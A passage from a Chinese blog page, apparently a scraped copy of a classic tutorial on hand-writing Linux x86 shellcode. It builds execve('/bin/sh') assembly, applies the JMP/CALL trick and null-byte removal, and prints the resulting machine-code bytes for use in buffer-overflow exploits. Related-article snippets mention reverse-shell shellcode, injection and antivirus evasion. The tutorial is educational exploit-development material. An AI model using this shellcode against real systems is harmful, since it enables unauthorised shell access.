linux 生成shellcode,书写Linux下自己的shellcode

最新推荐文章于 2024-04-22 09:53:35 发布
最新推荐文章于 2024-04-22 09:53:35 发布
阅读量116 收藏
点赞数
文章标签: linux 生成shellcode

: movl 0x10(%ebp),%edx

将NULL的地址赋给edx

0x80002ce : int $0x80

产生系统调用,进入核心态运行.

------------------------------------------------------------------------------------

看了上面的代码,现在我们可以把它精简为下面的汇编语言程序:

leal string,string_addr

movl $0x0,null_addr

movl $0xb,%eax

movl string_addr,%ebx

leal string_addr,%ecx

leal null_string,%edx

int $0x80

(我对Linux的汇编语言格式了解不多,所以这几句使用的是DOS汇编语言的格式)

string db "/bin/sh",0

string_addr dd 0

null_addr  dd 0

-------------------------------------------------------------------------------------

但是这段代码中还存在着一个问题 ,就是我们在编写ShellCode时并不知道这段程序执行

时在内存中所处的位置,所以像:

movl string_addr,%ebx

这种需要将绝对地址编码进机器语言的指令根本就没法使用.

解决这个问题的一个办法就是使用一条额外的JMP和CALL指令. 因为这两条指令编码使

用的都是 相对于IP的偏移地址而不是绝对地址, 所以我们可以在ShellCode的最开始加

入一条JMP指令, 在string前加入一条CALL指令. 只要我们计算好程序编码的字节长度

,就可以使JMP指令跳转到CALL指令处执行,而CALL指令则指向JMP的下一条指令,因为在

执行CALL指令时,CPU会将返回地址(在这里就是string的地址)压入堆栈,所以这样我们

就可以在运行时获得string的绝对地址.通过这个地址加偏移的间接寻址方法,我们还

可以很方便地存取string_addr和null_addr.

------------------------------------------------------------------------------

经过上面的修改,我们的ShellCode变成了下面的样子:

jmp 0x20

popl esi

movb $0x0,0x7(%esi)

movl %esi,0x8(%esi)

movl $0x0,0xC(%esi)

movl $0xb,%eax

movl %esi,%ebx

leal 0x8(%esi),%ecx

leal 0xC(%esi),%edx

int $0x80

call -0x25

string db "/bin/sh",0

string_addr dd 0

null_addr  dd 0 # 2 bytes,跳转到CALL

# 1 byte, 弹出string地址

# 4 bytes,将string变为以'\0'结尾的字符串

# 7 bytes

# 5 bytes

# 2 bytes

# 3 bytes

# 3 bytes

# 2 bytes

# 5 bytes,跳转到popl %esi

------------------------------------------------------------------------------------

我们知道C语言中的字符串以'\0'结尾,strcpy等函数遇到'\0'就结束运行.因此

为了保证我们的ShellCode能被完整地拷贝到Buffer中,ShellCode中一定不能含

有'\0'. 下面我们就对它作最后一次改进,去掉其中的'\0':

原指令:          替换为:

--------------------------------------------------------

movb $0x0,0x7(%esi)    xorl %eax,%eax

movl $0x0,0xc(%esi)    movb %eax,0x7(%esi)

movl %eax,0xc(%esi)

--------------------------------------------------------

movl $0xb,%eax       movb $0xb,%al

--------------------------------------------------------

OK! 现在我们可以试验一下这段ShellCode了. 首先我们把它封装为C语言的形式.

------------------------------------------------------------------------------

void main() {

__asm__("

jmp 0x18       # 2 bytes

popl %esi      # 1 byte

movl %esi,0x8(%esi) # 3 bytes

xorl %eax,%eax    # 2 bytes

movb %eax,0x7(%esi) # 3 bytes

movl %eax,0xc(%esi) # 3 bytes

movb $0xb,%al    # 2 bytes

movl %esi,%ebx    # 2 bytes

leal 0x8(%esi),%ecx # 3 bytes

leal 0xc(%esi),%edx # 3 bytes

int $0x80      # 2 bytes

call -0x2d      # 5 bytes

.string \"/bin/sh\" # 8 bytes

");

}

------------------------------------------------------------------------------

经过编译后,用gdb得到这段汇编语言的机器代码为:

\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b

\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xec\xff\xff\xff/bin/sh

接着我们就可以利用这段代码编写溢出程序了。(具体方法可以参考“缓冲区溢出机理分析”)

NewbeeSmart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python aes new_python--AES加密
weixin_39616287的博客
12-08 3750
AES加密,用的是第三方模块 pycryptodome安装:pip install pycryptodome -i https://pypi.douban.com/simpleECB模式加密:from Crypto.Cipher import AESimport base64password = '1234567890123456'.encode() #秘钥#秘钥:必须是16位字节或者24位字节或...
linux编写shellcode
duangduang2020的博客
11-21 1033
1、shellcode需要用到系统调用的调用号,可以通过unistd.h查看,具体某个系统调用的用法可以通过man syscall来查看 2、在现在的指令集中引入了syscall指令,但是原来的int 0x80调用正常可以使用。int 0x80调用将系统调用号放在eax, 参数依次放在ebx, ecx, edx, esi, edi;超过5个的将参数放在内存中,并将内存地址放在ebx寄存器中。 (
Python进阶强化训练之文件I/O高效处理技巧
weixin_33713707的博客
09-21 512
转载博客地址:https://ansheng.me/内容源自刘硕老师的《Python进阶强化训练》视频课程:http://coding.imooc.com/class/62.html如何读写文本文件?实际案例某文本文件编码格式已直(如UTF-8,GBK,BIG5),在python2.x和python3.x中分别如何读取这些文件?解决方案字符串的语义发生了变化:python2p...
Linux x86_64 shellcode的编写
小立仔
07-06 1335
Linux x86_64 shellcode的编写
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器
最新发布
gitblog_00002的博客
04-22 586
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
标题"此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell"表明包含的源代码是专门设计用来在Linux x86系统上生成shellcode的。"rar"文件可能是源代码的压缩包,而"shellcode_shell"可能指的是该...
ZSC:OWASP ZSC-Shellcode混淆代码生成
02-04
OWASP ZSC是用python编写的开源软件,可让您生成自定义的shellcode并将脚本转换为混淆的脚本。 可以使用python在Windows / Linux / OSX上运行该软件。 OWASP页面: : 文件: : 主页:http: 功能:http: ...
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等...
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
MIPS-Reverse:轻松生成MIPS反向shell shellcode
04-16
MIPS-Reverse是一种可以为架构生成shellcode的工具,该工具将启动反向shell ,您可以在其中指定IP地址,端口和所需的shell ( / bin / sh , / bin / bash , / bin / dash )。 如何安装 # 1. Install pwntools $ ...
将shllcode注入Linux中正在运行的进程(C/C++代码实现)
chen1415886044的博客
07-30 913
进程注入是一种在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可以允许访问该进程的内存、系统/网络资源,以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测,因为在合法进程下执行是被掩盖的。 有许多不同的方法可以将代码注入进程,其中许多方法滥用合法功能。这些实现适用于每个主要的操作系统,但通常是特定于平台的。 更复杂的样本可以利用命名管道或其他进程间通信(IPC)机制作为通信信道来执行对分段模块的多个进程注入,并进一步逃避检测。
shellcode基础-Linux木马构造流程
weixin_43988746的博客
12-13 952
编写Linux木马流程
Linux ShellCode实践
基基1234的博客
02-23 1154
1. 关于ShellCode ShellCode是一段二进制代码,最早被用于获取一个shell,因此而得名。这段二进制代码可以被cpu识别并执行,也就是我们所说的机器码。因为shellcode的这个特性,漏洞攻击最早出现的方法就是栈溢出+shellcode。而今天的主题,就是向零基础者展示一段shellcode的产生与执行,帮助读者举一反三。 2. ShellCode的产生 本节涉及的环境: u...
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3168
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
linux系统怎么拿shell,简述获取shellcode的几种方式
weixin_35483528的博客
04-29 620
原标题:简述获取shellcode的几种方式0×00 shellcode简介在攻击中,shellcode是一段用于利用软件漏洞的有效负载,shellcode是16进制的机器码,以其经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在寄存器eip溢出后,放入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。shellcode可以按照攻击者控制是...
木马免杀(篇二)shellcode 学习
Goodric的博客
08-10 1738
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell
[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)
「鸿渐之翼」的博客
04-29 2389
免责声明: 本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。 Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) * reverse shell tcp (1907) port shellcode C language - Linux/x86_64 Author : Kağan Çapar contact:
Linux32 shellcode实验实例
weixin_42582241的博客
11-19 1876
实验准备 vitualbox Ubuntu 实验一 shell.c代码: 编译shell.c并运行: 用gdb跟踪shell的运行,确定执行execve的系统功能调用号及其它寄存器的值: 反编译main函数: 反编译foo函数: 关键处设置断点: 反编译execve函数: 同样在call指令处设置断点: 此时可以看出,已到call指令执行处。 接下来进行si单步执行: 在此将进入内核的虚拟系统调用。 反汇编__kernel_vsyscall,设置断点,继续执行直到sysenter指令:
浅入浅出Liunx Shellcode
weixin_34033624的博客
05-15 208
/*————————————-Author:旋木木[[email]xuanmumu@gmail.com[/email]]Date:2008/05/12Website:[url]www.bugshower.org[/url]————————————–*/ 一:什么是shellcode话说某天某爱国***编译了一个Nday溢出利用程序来***CNN,输入IP并且enter之后发现...
Shellcode设计揭秘:Linux 2.2 on IA-32
Linux环境下,SHELLCODE通过调用系统调用来实现其功能。系统调用提供了与操作系统内核交互的接口,比如创建新进程(`fork()`)、执行外部程序(`execve()`)或改变当前进程权限(`setuid()`)。理解这些系统调用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值